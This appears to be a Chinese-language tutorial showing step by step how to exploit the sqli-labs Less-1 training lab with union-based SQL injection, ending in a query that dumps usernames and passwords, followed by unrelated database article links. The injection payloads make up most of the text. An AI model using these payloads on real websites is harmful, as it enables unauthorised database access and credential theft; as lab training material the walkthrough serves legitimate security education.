SQL注入实例(sqli-labs/less-1)

初始网页

从网页可知传递的参数名为 id,并且为数字类型

1、得知数据表有多少列

1.1 使用联合查询查找列数(效率低)
sql 复制代码
http://localhost/sqli-labs-master/Less-1/?id=1' union select 1,2 --+
1.2 使用order by查找列数(效率高)
sql 复制代码
http://localhost/sqli-labs-master/Less-1/?id=1' order by 3 --+

2、查看回显位置

sql 复制代码
?id=-1' union select 1,2,3 --+

3、查询当前数据库名

sql 复制代码
?id=-1' union select 1,database(),3 --+

4、查询当前表名

sql 复制代码
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

5、查询列名

sql 复制代码
?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'--+

6、查询最终数据

sql 复制代码
?id=-1' union select 1,group_concat(username,0x3a,password),3 from users --+

其他

查询当前数据库版本

sql 复制代码
?id=-1' union select 1,version(),3 --+

查询当前登录用户

sql 复制代码
?id=-1' union select 1,user(),3 --+
相关推荐
StarRocks_labs5 小时前
StarRocks Community Monthly Newsletter (Jun)
数据库·starrocks·数据湖·物化视图·存算分离
光电的一只菜鸡6 小时前
ubuntu之坑(十五)——设备树
linux·数据库·ubuntu
ob熔天使——武7 小时前
MySQL
数据库·mysql
小光学长7 小时前
基于vue框架的防疫物资仓库管理系统09y38(程序+源码+数据库+调试部署+开发环境)带论文文档1万字以上,文末可获取,系统界面在最后面。
数据库
野生技术架构师11 小时前
MySQL数据实时同步到Elasticsearch的高效解决方案
数据库·mysql·elasticsearch
白仑色11 小时前
Oracle 高可用性与安全性
数据库·oracle·数据安全·goldengate·高可用架构
紫无之紫12 小时前
SQL性能调优经验总结
数据库·sql·性能调优
CZZDg12 小时前
Redis Sentinel哨兵集群
java·网络·数据库
__风__12 小时前
PostgreSQL ExecInitIndexScan 函数解析
数据库·postgresql
小云数据库服务专线13 小时前
GaussDB in的用法
数据库·sql·gaussdb